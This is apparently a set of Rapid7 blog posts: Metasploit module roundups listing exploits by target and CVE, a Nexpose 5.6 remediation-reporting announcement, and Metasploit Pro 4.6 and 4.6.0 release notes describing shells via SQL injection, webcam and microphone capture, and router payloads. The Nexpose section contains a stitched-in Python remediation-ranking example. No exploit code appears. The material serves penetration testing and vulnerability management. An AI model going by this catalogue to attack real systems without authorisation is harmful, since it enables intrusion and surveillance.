- NETGEAR ReadyNAS Perl Code Evaluation by juan vazquez, hdm, and Craig Young exploits CVE-2013-2751
- Pandora FMS Remote Code Execution by xistence
- Supermicro Onboard IPMI close_window.cgi Buffer Overflow by juan vazquez and hdm exploits CVE-2013-3623
- Synology DiskStation Manager SLICEUPLOAD Remote Command Execution by Markus Wulftange exploits
CVE-2013-6955SerComm Device Remote Code Execution by Eloi Vanderbeken and Matt "hostess" Andreko exploits OSVDB-101653Loadbalancer.org Enterprise VA SSH Private Key Exposure by xistenceQuantum DXi V1000 SSH Private Key Exposure by xistenceQuantum vmPRO Backdoor Command by xistenceFirefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution by joev, Mariusz Mlynski, and moz_bug_r_a4 exploits CVE-2013-1710Apache Roller OGNL Injection by juan vazquez and Unknown exploits CVE-2013-4212Cisco Prime Data Center Network Manager Arbitrary File Upload by juan vazquez and rgod exploits ZDI-13-254Adobe ColdFusion 9 Administrative Login Bypass by Mekanismen and Scott Buckel exploits CVE-2013-0632Dexter (CasinoLoader) SQL Injection by bwall (Brian Wallace)HP SiteScope issueSiebelCmd Remote Code Execution by juan vazquez and rgod exploits ZDI-13-263MediaWiki Thumb.php Remote Command Execution by Ben Campbell, Ben Harris, Brandon Perry, and Netanel Rubin exploits CVE-2014-1610Oracle Forms and Reports Remote Code Execution by Mekanismen and miss_sudo exploits CVE-2012-3153Apache Struts 2 Developer Mode OGNL Execution by juan vazquez, Alvaro, Andreas Nusser, and Johannes Dahse exploits CVE-2012-0394Apache Tomcat Manager Authenticated Upload Code Execution by rangercha exploits ZDI-10-214Up.Time Monitoring Station post2file.php Arbitrary File Upload by Denis Andzakovic exploits OSVDB-100423vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload by juan vazquez and Egidio Romano exploits CVE-2013-3215Safari User-Assisted Download and Run Attack by joevArray Networks vAPV and vxAG Private Key Privilege Escalation Code Execution by xistence exploits OSVDB-104654FreePBX config.php Remote Code Execution by 0x00string, i-Hmx, and xistence exploits CVE-2014-1903Horde Framework Unserialize PHP Code Execution by juan vazquez and EgiX exploits CVE-2014-1691Kimai v0.9.2 'db_restore.php' SQL Injection by Brendan Coles and drone exploits OSVDB-93547OpenSIS 'modname' PHP Code Execution by Brendan 
Coles and EgiX exploits CVE-2013-1349WordPress OptimizePress Theme File Upload Vulnerability by Mekanismen and United of Muslim Cyber ArmySimple E-Document Arbitrary File Upload by Brendan Coles and vinicius777SkyBlueCanvas CMS Remote Code Execution by Scott Parish and xistence exploits CVE-2014-1683vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection by juan vazquez and Orestis Kourides exploits CVE-2013-3522Zimbra Collaboration Server LFI by Mekanismen and rubina119 exploits CVE-2013-7091Symantec Endpoint Protection Manager Remote Command Execution by Chris Graham, Stefan Viehbock, and xistence exploits CVE-2013-5015Adobe Reader ToolButton Use After Free by sinn3r, juan vazquez, Soroush Dalili, and Unknown exploits ZDI-13-212MS12-022 Microsoft Silverlight ScriptObject Unsafe Memory Access by juan vazquez, James Forshaw, and Vitaliy Toropov exploits CVE-2013-3896MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow by juan vazquez and Unknown exploits CVE-2013-3918MS14-012 Internet Explorer TextRange Use-After-Free by sinn3r and Jason Kratzer exploits CVE-2014-0307KingScada kxClientDownload.ocx ActiveX Remote Code Execution by juan vazquez and Andrea Micalizzi exploits ZDI-14-011Adobe Reader ToolButton Use After Free by sinn3r, juan vazquez, Soroush Dalili, and Unknown exploits ZDI-13-212ALLPlayer M3U Buffer Overflow by Gabor Seljan, Mike Czumak, and metacom exploits OSVDB-98283Audiotran PLS File Stack Buffer Overflow by Philip OKeefeEasy CD-DA Recorder PLS Buffer Overflow by juan vazquez, Gabor Seljan, and chap0 exploits CVE-2010-2343IBM Forms Viewer Unicode Buffer Overflow by juan vazquez and rgod exploits ZDI-13-274IcoFX Stack Buffer Overflow by juan vazquez and Marcos Accossatto exploits CVE-2013-4988MPlayer Lite M3U Buffer Overflow by C4SS!0 and h1ch4m and Gabor Seljan exploits BID-46926MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow by sinn3r and Unknown exploits CVE-2013-3906RealNetworks RealPlayer Version 
Attribute Buffer Overflow by Gabor Seljan exploits CVE-2013-7260Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow by Fr330wn4g3 and Mike Czumak exploits OSVDB-100619DesktopCentral AgentLogUpload Arbitrary File Upload by Thomas HibbertHP LoadRunner EmulationAdmin Web Service Directory Traversal by juan vazquez and rgod exploits ZDI-13-259Kaseya uploadImage Arbitrary File Upload by Thomas Hibbert exploits OSVDB-99984Windows Escalate UAC Protection Bypass (In Memory Injection) by Ben Campbell, David Kennedy "ReL1K", mitnick, and mubixWindows SYSTEM Escalation via KiTrap0D by HD Moore, OJ Reeves, Pusscat, and Tavis Ormandy exploits CVE-2010-0232Windows TrackPopupMenuEx Win32k NULL Page by Dan Zentner, Matias Soler, Seth Gibson, and Spencer McIntyre exploits CVE-2013-3881Microsoft Windows ndproxy.sys Local Privilege Escalation by juan vazquez, Shahin Ramezany, Unknown, and ryujin exploits CVE-2013-5065Nvidia (nvsvc) Display Driver Service Local Privilege Escalation by Ben Campbell and Peter Wintersmith exploits CVE-2013-0109Windows Command Shell Upgrade (Powershell) by Ben CampbellHP Data Protector Backup Client Service Remote Code Execution by juan vazquez and Aniway.Anyway exploits ZDI-14-008HP Data Protector Backup Client Service Directory Traversal by juan vazquez and Brian Gorenc exploits ZDI-14-003SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write by Brendan Coles and Mohamed Shetta exploits OSVDB-103671ABB MicroSCADA wserver.exe Remote Code Execution by juan vazquez and Brian Gorenc exploits ZDI-13-270GE Proficy CIMPLICITY gefebt.exe Remote Code Execution by juan vazquez, Z0mb1E, and amisto0x07 exploits ZDI-14-015Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow by juan vazquez and RedsadicYokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow by juan vazquez and RedsadicAuxiliary and post modulesRed Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection by Ramon de C Valle exploits CVE-2013-2050Linksys WRT120N 
tmUnblock Stack Buffer Overflow by Craig Heffner and Michael Messner exploits OSVDB-103521ZyXEL GS1510-16 Password Extractor by Daniel Manser and Sven VetschSerComm Device Configuration Dump by Eloi Vanderbeken and Matt "hostess" Andreko exploits OSVDB-101653Apache Commons FileUpload and Apache Tomcat DoS by Unknown and ribeirux exploits CVE-2014-0050Gzip Memory Bomb Denial Of Service by joev and infoRuby on Rails Action View MIME Memory Exhaustion by joev, sinn3r, and Toby Hsieh exploits CVE-2013-6414Ruby on Rails JSON Processor Floating Point Heap Overflow DoS by joev, todb, and Charlie Somerville exploits CVE-2013-4164IBM Lotus Sametime WebPlayer DoS by Chris John Riley and kicks4kittens exploits CVE-2013-3986Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow by juan vazquez and RedsadicDNS Non-Recursive Record Scraper by Brandon McCann "zeknox" and Rob Dixon "304geek"DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials by Brendan ColesDrupal OpenID External Entity Injection by juan vazquez and Reginaldo Silva exploits CVE-2012-4554IBM Lotus Notes Sametime User Enumeration by kicks4kittensIBM Lotus Notes Sametime Room Name Bruteforce by kicks4kittensIBM Lotus Sametime Version Enumeration by kicks4kittensJoomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read by Brandon PerryMantisBT Admin SQL Injection Arbitrary File Read by Brandon Perry and Jakub Galczyk exploits CVE-2014-2238vBulletin Password Collector via nodeid SQL Injection by sinn3r, juan vazquez, and Orestis Kourides exploits CVE-2013-3522Chargen Probe Utility by Matteo Cantoni exploits CVE-1999-0103A10 Networks AX Loadbalancer Directory Traversal by xistence exploits OSVDB-102657Cisco ASA ASDM Bruteforce Login Utility by Jonathan ClaudiusOpenMind Message-OS Portal Login Brute Force Utility by Karn GaneshenOracle ILO Manager Login Brute Force Utility by Karn GaneshenManageEngine Support Center Plus Directory Traversal by xistence exploits OSVDB-102656Typo3 Login 
Bruteforcer by Christian MehlmauerWordpress Scanner by Christian MehlmauerPoison Ivy Command and Control Scanner by SeawolfRNSerComm Network Device Backdoor Detection by Eloi Vanderbeken and Matt "hostess" Andreko exploits OSVDB-101653Printer File Download Scanner by wvu, sinn3r, MC, Matteo Cantoni, and Myo SoePrinter Environment Variables Scanner by wvu, sinn3r, MC, Matteo Cantoni, and Myo SoePrinter Directory Listing Scanner by wvu, sinn3r, MC, Matteo Cantoni, and Myo SoePrinter Volume Listing Scanner by wvu, sinn3r, MC, Matteo Cantoni, and Myo SoePrinter Ready Message Scanner by wvu, sinn3r, MC, Matteo Cantoni, and Myo SoePrinter Version Information Scanner by wvu, sinn3r, MC, Matteo Cantoni, and Myo SoeMS08-067 Scanner by wvu, hdm, Brett Moore, frank2, jduck, and sho-luv exploits CVE-2008-4250Firefox XSS by joevMulti Gather Malware Verifier by sinn3rMulti Manage YouTube Broadcast by sinn3rOSX Screen Capture by Peter TothOSX Gather Autologin Password as Root by joevOSX Gather Safari LastSession.plist by sinn3rOSX Network Share Mounter by joev and Peter TothOSX VPN Manager by Peter TothWindows Gather SmarterMail Password Extraction by sinn3r, Brendan Coles, and Joe GironWindows Gather Active Directory Service Principal Names by Ben Campbell and Scott SutherlandWindows Gather Active Directory User Comments by Ben CampbellWindows Gather Skype, Firefox, and Chrome Artifacts by Joshua HarperWindows Enumerate LSA Secrets by Rob BathurstWindows Manage Driver Loader by Borja MerinoWindows Manage Proxy PAC File by Borja MerinoPlease also note the release notes from this release versus the last weekly update.Get your free Metasploit download or trial on the Rapid7 website now!

Simplify Vulnerability Management with Nexpose 5.6

We are pleased to announce the next major release of Nexpose, version 5.6. This release focuses on providing you the most impactful remediation steps to reduce risk to your organization and extends our current configuration assessment functionality.

New Look and Feel

The most visible change in Nexpose 5.6 is the new look and feel of the user interface. The action header is now smaller to maximize screen space and usability, and the new colour scheme makes it easier to focus on important areas of the application.

Simplifying Remediation Prioritization

Security teams are often inundated with thousands of vulnerabilities across all their assets throughout their entire network. One of the major challenges facing security teams is the difficulty of translating known vulnerabilities (the "What") discovered on their network into remediation steps (the "How"). With all of the vulnerabilities on the network, security teams struggle to determine which vulnerabilities are the most important to fix and what they need to do to remediate them. There are many different ways that this can be tackled. Organizations can go from the top down the vulnerability list based on security risk using a metric like CVSS, focus on their business-critical systems first, or throw darts at a wall. In all cases, security teams are focusing on fixing each vulnerability individually on the list of assets they care about. When you are getting into the thousands of vulnerabilities, with more coming every day, it becomes almost impossible for security teams to act, as they spend all their time worrying about fires and the next big thing.

The other main problem facing security teams is that they often are not the teams performing the actual remediation. Usually they work with the IT team to apply a patch, upgrade to a new version of the vulnerable software on the affected asset, or perform another mitigation technique. The problem is that security and IT teams often speak different languages that are frequently incompatible with each other. As an example, the security administrator managing the vulnerability management program in an organization might notice that there is a serious vulnerability on a specific asset. After determining whether or not the vulnerability was valid (it was!) and determining which IT administrator was responsible for that asset, the security administrator is now responsible for telling the IT admin to patch that host. Simple enough. The security admin will just tell the IT guy, or create a ticket, to state that they need to patch the critical vulnerability CVE-2013-1234 on the asset. They'll probably include the fact that it has a CVSS score of 10.0 and that it's highly critical. All important things to the security admin, but completely useless information to the IT admin. The IT guy is now forced to figure out what all the security mumbo-jumbo means and translate it into something they can understand.

Making it easy for IT teams to take action on vulnerabilities is only the first step. With thousands of vulnerabilities to manage, going through them one by one does not scale, and providing a thousand-page report with all the information within it makes matters worse. For every vulnerability on your network that you solve, even more come in on a day-to-day basis. It is imperative that security teams have a system that allows them to prioritize fixing the right risks that affect their organization.

Not all of the thousands of vulnerabilities that affect a specific organization have different remediation steps. With vulnerability supersedence and product updates, multiple vulnerabilities can often be fixed by performing one step. If an asset has twenty vulnerabilities on it when scanned with Nexpose, but all of them are associated with Adobe Flash, then the solution for all twenty vulnerabilities would be to upgrade the version of Adobe Flash on that host. It is a simple solution that solves the problem for the security admin, presents the information in a way that the IT admin understands ("Patch Flash on Host"), and moves teams away from treating vulnerability counts as the default metric for how you look at data.

It is a powerful way of thinking about managing your vulnerability program. Instead of focusing on vulnerabilities one by one, you can ask the question, "What is the one thing I can do that will minimize my security risk the most, and how much will it lower it by?"

Nexpose 5.6 includes two new reports that help make your life easier. The first report is a high-level summary that allows you to see, in a prioritized view, the top 'n' remediation actions that will reduce your level of risk. The report also provides guidance on how the overall security profile of your organization will improve by applying these remediation steps. These include, as percentages, the following metrics:

- Overall Vulnerability Risk (% Reduced)
- Number of Assets Remediated
- Number of Vulnerabilities with Known Exploits Remediated (% Reduced)
- Number of Vulnerabilities associated with Known Malware Kits Remediated (% Reduced)

Like any other report in Nexpose, you can restrict the data in the report to specific Sites, Asset Groups, or vulnerability categories for further configurability and granularity. For example, if you have a Dynamic Asset Group that is configured to only include Windows assets, you can create a remediation report that only lists the prioritized remediations for the Windows assets in your environment. This allows you to tailor actionable reports to different IT groups within your organization in a language they understand.

Configuration Compliance Enhancements

Nexpose 5.6 also adds new content within the Policy Manager around configuration assessment. The latest version of Nexpose includes new certified Center for Internet Security (CIS) Benchmarks for the Red Hat Enterprise Linux 4, 5, and 6 operating systems.

We are extending the ability, introduced with the release of Windows CIS Policy content in Nexpose 5.5, for organizations to determine their overall level of compliance with common best practices developed by CIS. This is a big deal for organizations who need to measure their level of compliance against known best standards on Red Hat Enterprise Linux hosts.

Determining the overall level of compliance can be a difficult problem to solve for a lot of organizations. They either have to perform the assessment by hand across all of their assets, or use multiple toolsets to pull out this data. Nexpose is flexible to the needs of organizations by allowing users to scan for both vulnerabilities and configuration issues within a unified assessment toolset, minimizing the amount of scan configuration and time required to get vulnerability, application and configuration result data in a low-touch manner. Users can add any selection of policies, either old or new, to any scan template.

In addition, if your organization has decided that the included CIS Red Hat Enterprise Linux benchmarks within the product are a great baseline but do not necessarily meet the needs of your organization, you can use our Policy Editor to make modifications to copies of the included policies within Nexpose. You can then include these custom policies in any scan template for inclusion within a scan.

These features are designed to simplify the overall experience for our customers. We want you to make informed and intelligent decisions on what you should do next, freeing up time for you to act, rather than spending time trying to mine through vulnerability and compliance data or dealing with IT. We know that focusing on a remediation view allows you to build a rapport with the IT teams, maximize risk savings while minimizing work effort, and overall simplify and strengthen the security posture of your organization.

For more information on Nexpose 5.6, you can look at the release notes here.
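The solution-centric ranking the remediation report section describes (group findings by the single step that fixes them, rank the steps by the risk they remove, and report the four summary percentages) as an added Python example. It is not Nexpose code: the `Finding` shape, the per-finding risk scores and the asset/solution labels are constructed sample data, and the `scope` argument stands in for restricting a report to an asset group.

```python
"""Solution-centric remediation ranking over constructed scan findings."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set


@dataclass(frozen=True)
class Finding:
    """One vulnerability instance on one asset (constructed record shape)."""
    asset: str
    vuln_id: str
    risk: float            # risk score this finding contributes
    solution: str          # the single remediation step that fixes it
    has_exploit: bool      # a public exploit is known for the vulnerability
    in_malware_kit: bool   # the vulnerability is used by a known malware kit


def _pct(part: float, whole: float) -> float:
    """Percentage of `whole` covered by `part`; 0.0 when there is nothing to reduce."""
    return round(100.0 * part / whole, 1) if whole else 0.0


def prioritize(findings: Iterable[Finding], top_n: int,
               scope: Optional[Set[str]] = None) -> List[dict]:
    """Return the top_n remediation steps, highest risk removed first.

    `scope` mimics limiting a report to an asset group: only findings on those
    assets are ranked, and every percentage is relative to that subset.
    """
    pool = [f for f in findings if scope is None or f.asset in scope]
    total_risk = sum(f.risk for f in pool)
    total_exploitable = sum(1 for f in pool if f.has_exploit)
    total_malware = sum(1 for f in pool if f.in_malware_kit)

    # One step fixes many findings: group by solution, not by vulnerability.
    by_solution = defaultdict(list)
    for f in pool:
        by_solution[f.solution].append(f)

    # Most risk removed first; ties broken by number of vulnerabilities fixed.
    ranked = sorted(by_solution.items(),
                    key=lambda kv: (sum(f.risk for f in kv[1]), len(kv[1])),
                    reverse=True)

    plan, cumulative_risk = [], 0.0
    for solution, fixed in ranked[:top_n]:
        step_risk = sum(f.risk for f in fixed)
        cumulative_risk += step_risk
        plan.append({
            "solution": solution,
            "vulnerabilities_fixed": len(fixed),
            "assets_remediated": len({f.asset for f in fixed}),
            "risk_reduced_pct": _pct(step_risk, total_risk),
            "exploitable_reduced_pct": _pct(
                sum(1 for f in fixed if f.has_exploit), total_exploitable),
            "malware_kit_reduced_pct": _pct(
                sum(1 for f in fixed if f.in_malware_kit), total_malware),
            "cumulative_risk_reduced_pct": _pct(cumulative_risk, total_risk),
        })
    return plan


# Constructed sample scan: three hosts, four distinct remediation steps.
SAMPLE_FINDINGS = [
    Finding("web01", "flash-A", 9.0, "Upgrade Adobe Flash", True, True),
    Finding("web01", "flash-B", 7.5, "Upgrade Adobe Flash", True, False),
    Finding("ws03",  "flash-A", 9.0, "Upgrade Adobe Flash", True, True),
    Finding("db02",  "java-A",  8.0, "Upgrade Oracle Java", True, False),
    Finding("db02",  "java-B",  4.0, "Upgrade Oracle Java", False, False),
    Finding("web01", "ssl-A",   5.0, "Apply OpenSSL vendor patch", False, False),
    Finding("ws03",  "ie-A",    6.5, "Apply MS14-012", True, True),
]
# Stand-in for a Dynamic Asset Group holding only the Windows hosts (constructed).
WINDOWS_ASSETS = {"ws03"}


if __name__ == "__main__":
    for step in prioritize(SAMPLE_FINDINGS, top_n=2):
        print(step)
    print("Windows-only view:")
    for step in prioritize(SAMPLE_FINDINGS, top_n=5, scope=WINDOWS_ASSETS):
        print(step)
```

With the sample data, a single "Upgrade Adobe Flash" step removes three findings on two hosts and just over half of the total risk, which is the "one thing I can do" answer the report is meant to surface.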

Metasploit Pro 4.6 Adds OWASP Top 10 2013 and Security Auditing Wizards

Today, we released Metasploit Pro 4.6, which brings you some awesome new features for your enterprise security program.

Updated Web Application Security Testing with Support for OWASP Top 10 2013

Web applications are gaining more and more traction, both through internally developed applications and by adding SaaS-based solutions. These applications often contain some of the most confidential information in the organization, such as financial and customer data, credit card numbers, medical data, and intellectual property. To enable you to audit the security of these applications, Metasploit Pro's web application auditing functionality has been significantly enhanced in the new release:

- Support for OWASP Top 10 2013: Release 4.6 broadens the scope of Metasploit's security auditing with the inclusion of testing capabilities for the upcoming Open Web Application Security Project (OWASP) Top 10 2013, which is currently in the Release Candidate stage. The list identifies ten of the most critical risks relating to web applications. Due to the popularity of, and increasing reliance on, web applications, they are involved in the majority of breaches. Metasploit addresses this, enabling organizations to audit the security of their web-based applications, whether they be out of the box or custom, on-premise or in the cloud. This helps security professionals identify issues before a malicious attacker does. Learn more about what's new in our OWASP Top 10 2013 webcast.
- Revamped user interface: Metasploit's web application security testing is now easier to use and includes a wizard that walks you through the process. This speeds up the process for seasoned web application penetration testers, and makes it really easy for new users to conduct baseline assessments.
- More effective website spider: Like Google crawling the web to index pages, Metasploit Pro's spider follows linked pages to map out the entire application. The updated spider is now more efficient and follows harder-to-find links to ensure comprehensive testing.
- Get shells using SQL injection: SQL injections are among the top causes of compromise for web applications, posing a huge risk to confidential data. Most SQL injection attacks give you access to the data in the database; Metasploit Pro's new SQL injection attacks go beyond this, giving penetration testers a session on the machine, which is equivalent to having administrative rights on it. This gives the penetration tester not only access to the database but also to other information on the machine, and opens the door to pivot to other machines.
- Support for web app authentication: Many web applications require login credentials for access. Metasploit Pro now supports the five most common authentication types.
- Web app report with remediation advice: Finding vulnerabilities is great, but the goal is to eliminate them. The remediation advice provided in Metasploit's reports should serve as a valuable basis for discussions with internal developers and external SaaS application providers.

Security Auditing Wizards Accelerate Engagements, Simplify Baseline Assessments

Metasploit Pro 4.6 also introduces the concept of Security Auditing Wizards, which walk the user through the steps of a typical engagement. Seasoned penetration testers will find that the wizards shortcut the first steps of an engagement, making them more productive. For new Metasploit Pro users, the new wizards provide a great way to easily conduct baseline assessments to find low-hanging fruit. Release 4.6 introduces three new wizards:

- Quick Penetration Testing Wizard: This wizard guides security professionals through a baseline penetration test. Requiring users only to enter an IP range, the wizard discovers assets, fingerprints hosts, determines potential attacks, runs exploits of a certain safety level, and provides a report. The wizard can either serve as a first step for a more in-depth security assessment or as a baseline penetration test to find low-hanging fruit, either as a regular security practice or before a third-party audit to make it more effective.
- Web Application Testing Wizard: Requiring only a base URL to start, this wizard crawls the web application, finds exploitable vulnerabilities, and creates a report with remediation information. It is a great, quick way to assess the security of an application during regular assessments or as a gate before releasing it to production.
- Phishing Simulation Wizard: Phishing emails with links or attachments that try to exploit a user's machine are a big threat vector for many organizations, both for spear phishing and for untargeted attacks. Metasploit Pro's social engineering campaigns enable organizations to measure their exposure by sending simulated phishing emails, both to get a general sense of the size of the risk and to verify a reduction of risk after conducting security awareness trainings.

Metasploit Pro 4.6 is available for download now

All of these improvements in Metasploit Pro 4.6 are in addition to the weekly updates to all Metasploit editions, both free and commercial ones (read todb's awesome post on Metasploit Framework updates). Existing users of Metasploit can update their installation using the in-product update feature (Kali Linux users may see the update in four hours at the latest as the Kali repos sync). If you want to learn more about what's new in OWASP Top 10 2013, reserve a free seat in our OWASP webcast today. For a free trial of Metasploit Pro, download the Metasploit installer now.

Metasploit 4.6.0 Released!

We just released Metasploit 4.6.0, so applying this week's update will get you the brand new version. While Chris has a delightful blog post of what all is new in Metasploit Pro, let's take a look at what's exciting and new between Metasploit 4.5.0 and today's update to 4.6.0.

138 new modules

First off, the hacker elves have been cranking out a ton of module content since we released 4.5.0 back in December 2012. Between then and now, we've got 138 new modules. That's 1.1 new modules per day, including those days that other people call "weekends" and "holidays." Of those, we have 80 new exploits, 44 new auxiliary modules, and 12 new post modules.

Of course, most of the module commits don't originate with us here at Rapid7. Over this release, we have 86 distinct committers contributing to Metasploit, and only 11 of them are employed here at Rapid7. It's this overwhelming strength of the Metasploit exploit development community that keeps me super-excited to do Good Work every day. Seriously, thank you all for that. I'm getting all verklempt here.

A stroll down diff lane

Of course, we did a little more than just sling exploit code for 4.6.0. We also moved the ball forward on a whole bunch of core development and security research. Here are the highlights:

- We got serious about unit testing. Exploit writers are notorious for writing quick, throw-away code, born of the race to get a working PoC together before the next guy (and the next patch!). Since Metasploit Framework is largely written by exploit devs, this habit has been really hard to combat. That said, on the road to 4.6.0, we integrated Travis-CI to run our growing library of RSpec tests. We're a long way from done there, of course, but we've made some pretty significant progress.
- We detailed our peer code review practices for landing new code and new modules. Open source security development means taking risks, leaving your comfort zone, and suffering the slings and arrows of code review. Believe me, it's a lot easier to just pile on hack after hack when you're sitting in your closed-source cubicle farm, but developing in public means that we get to review and critique code from all comers. In the end, we hope we're being helpful, and fewer mistakes are repeated next time.
- We ported a bunch of 0day for Metasploit users. This kind of fast turnaround immediately puts the tools to test and validate remediation directly in the hands of the people who are best positioned to help: you. In addition, Metasploit exploits are now making it into other projects' regression testing cases, and are used to teach the next wave of security researchers how to quickly turn a found-in-the-wild 0day into a useful, safe, and effective exploit module.
- We implemented a pretty novel new Postgres payload delivery system -- just in time for the recent wave of Postgres vulnerabilities! Nothing proves a vulnerability better than popping shells.
- We invented a portable Ruby command exec payload to take advantage of the wave of Rails vulnerabilities announced these last couple of months. While getting a Rails server to print "hello world!" on the console is all well and good, it's really all about the shells.
- We updated msfupdate to fully take advantage of our Git-based source code control systems, as well as to use the Metasploit Community and Pro edition update systems. We recognize that most Metasploit users really just want stability and security in their updates, and tracking along a source code tree isn't usually the way to get there. So, now installed versions of Metasploit (including Kali-installed Debian packages) will only update once a week, after the usual in-house QA and validation.
- We turned exploited endpoints into Hollywood-hacker spy systems. Thanks to a user bug, we found that the record_mic feature of Meterpreter had been broken for a little while. So, we fixed it, wrapped it up in a post module, added a webcam activation module and some CCTV controllers, and unleashed these A/V-centric modules into the world. I have no idea if real espionage agents actually do this kind of thing or not, but now you can prove that they can on your next pentest engagement. After all, that's kind of the point of a penetration test -- you want to be able to simulate what a real adversary could do in order to bring attention to the real risk of vulnerabilities.
- We put together some UPnP modules to help people scan their enterprises for misconfigured and buggy UPnP endpoints. You are blocking and watching UDP port 1900 by now, right?
- We asked you nicely to msftidy.rb your modules as part of a Git pre-commit hook. Since we started automating msftidy, the module quality we've been seeing shot up considerably, and we've been able to move new modules through the pull request queue a lot faster with a lot fewer common mistakes. Of course, as a result, we now get more pull requests. I'm sure there's an economics lesson about friction in there somewhere.
- We started using a new heap spray technique for our many browser-based exploits. This was on the heels of some very excellent training and collaboration with the Corelan Team. Now, with a little luck, we can write more reliable exploits all the way through Internet Explorer 10, as well as Firefox 54 (or whatever their latest version is by the time this post goes live).
- We now support Kali as an installation target. This was a huge accomplishment, thanks to the teamwork between Rapid7 and Offensive Security, getting a stable, supportable build into the hands of Kali Linux users worldwide. Assuming this ends up working out as we expect, we should be able to start supporting other platforms, such as Ubuntu, Debian, and Mint, with proper Debian packages. (We're also experimenting with a for-real Homebrew tap for you Mac OSX guys, but shhh, it's not official yet.)
- We pushed the envelope on WAP/Router hacking by landing a metric ton of exploit and auxiliary modules targeting Linksys, D-Link, and Netgear devices, as well as putting together command execution payloads custom built for MIPS computing environments.

So, yeah. Been a busy four months or so. All of those bullets start with the word "we," and like I said, that's not just Rapid7 folks; it's all of you who pitched in with your work, patience, smarts, and gumption to get this thing out the door. Thanks!

Module roundup

If you're upgrading from 4.5.0 to 4.6.0, here's the laundry list of security testing goodness you have to look forward to. Let's be careful out there!

- OpenPLI Webif Arbitrary Command Execution by Michael Messner exploits OSVDB-90230
- HP System Management Anonymous Access Code Execution by agix exploits OSVDB-91812
- Linksys E1500/E2500 apply.cgi Remote Command Injection by juan vazquez and Michael Messner exploits OSVDB-89912
- Netgear DGN1000B setup.cgi Remote Command Execution by juan vazquez and Michael Messner exploits OSVDB-89985
- MongoDB nativeHelper.apply Remote Code Execution by agix exploits CVE-2013-1892
- Novell eDirectory 8 Buffer Overflow by juan vazquez, David Klein, and Gary Nilson exploits CVE-2012-0432
- PostgreSQL for Linux Payload Execution by egyp7, todb, and midnitesnake
- Java Applet AverageRangeStatisticImpl Remote Code Execution by juan vazquez and Unknown exploits CVE-2012-5076
- Java Applet JMX Remote Code Execution by sinn3r, juan vazquez, egyp7, and Unknown exploits CVE-2013-0422
- Java Applet JMX Remote Code Execution by juan vazquez, Adam Gowdiak, SecurityObscurity, and Unknown exploits CVE-2013-0431
- Java Applet Method Handle Remote Code Execution by juan vazquez and Unknown exploits CVE-2012-5088
- eXtplorer v2.1 Arbitrary File Upload Vulnerability by Brendan Coles exploits OSVDB-88751
- Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability by AkaStep and Brendan Coles
- Jenkins Script-Console Java Execution by Spencer McIntyre and jamcut
- Kordil EDMS v2.2.60rc3 Unauthenticated Arbitrary File Upload Vulnerability by Brendan Coles
- Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution by Gary O'Leary-Steele, Kacper Nowak, and Nick Blundell exploits CVE-2013-0209
- Mutiny Remote Command Execution by juan vazquez and Christopher Campbell exploits CVE-2012-3001
- Netwin SurgeFTP Remote Command Execution by sinn3r and Spencer McIntyre
- PolarPearCms PHP File Upload Vulnerability by Fady Mohamed Osman exploits CVE-2013-0803
- Ruby on Rails JSON Processor YAML Deserialization Code Execution by egyp7, jjarmoc, and lian exploits CVE-2013-0333
- Ruby on Rails XML Processor YAML Deserialization Code Execution by hdm, charliesome, espes, and lian exploits CVE-2013-0156
- SonicWALL GMS 6 Arbitrary File Upload by juan vazquez, Julian Vilas, and Nikolas Sotiriu exploits CVE-2013-1359
- Splunk 5.0 Custom App Remote Code Execution by sinn3r, juan vazquez, and marcwickenden
- Apache Struts ParametersInterceptor Remote Code Execution by Meder Kydyraliev, Richard Hicks, and mihi exploits CVE-2011-3923
- STUNSHELL Web Shell Remote PHP Code Execution by bwall
- STUNSHELL Web Shell Remote Code Execution by bwall
- v0pCr3w Web Shell Remote Code Execution by bwall
- Novell ZENworks Configuration Management Remote Execution by juan vazquez and James Burton exploits ZDI-13-049
- Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution by bwall exploits OSVDB-91663
- Portable UPnP SDK unique_service_name() Remote Code Execution by hdm, Alex Eubanks, and Richard Harman exploits CVE-2012-5958
- Setuid Tunnelblick Privilege Escalation by juan vazquez and Jason A. Donenfeld exploits CVE-2012-3485
- Viscosity setuid-set ViscosityHelper Privilege Escalation by juan vazquez and Jason A. Donenfeld exploits CVE-2012-4284
- DataLife Engine preview.php PHP Code Injection by juan vazquez and EgiX exploits CVE-2013-1412
- Foswiki MAKETEXT Remote Command Execution by juan vazquez and Brian Carlson exploits CVE-2012-6329
- Joomla Component JCE File Upload Remote Code Execution by Heyder Andrade and Unknown exploits BID-49338
- Nagios3 history.cgi Host Command Execution by Daniele Martini, Jose Selvi, Unknown, and blasty exploits CVE-2012-6096
- Nagios XI Network Monitor Graph Explorer Component Command Injection by sinn3r and Daniel Compton exploits OSVDB-83552
- OpenEMR PHP File Upload Vulnerability by juan vazquez and Gjoko Krstic exploits OSVDB-90222
- PHP-Charts v1.0 PHP Code Execution Vulnerability by AkaStep and Brendan Coles exploits OSVDB-89334
- TWiki MAKETEXT Remote Command Execution by juan vazquez and George Clark exploits CVE-2012-6329
- WordPress Plugin Advanced Custom Fields Remote File Inclusion by Charlie Eriksen exploits OSVDB-87353
- WordPress Asset-Manager PHP File Upload Vulnerability by James Fitts and Sammy FORGIT exploits OSVDB-82653
- WordPress Plugin Google Document Embedder Arbitrary File Disclosure by Charlie Eriksen exploits CVE-2012-4915
- WordPress WP-Property PHP File Upload Vulnerability by James Fitts and Sammy FORGIT exploits OSVDB-82656
- ZoneMinder Video Server packageControl Command Execution by Brendan Coles
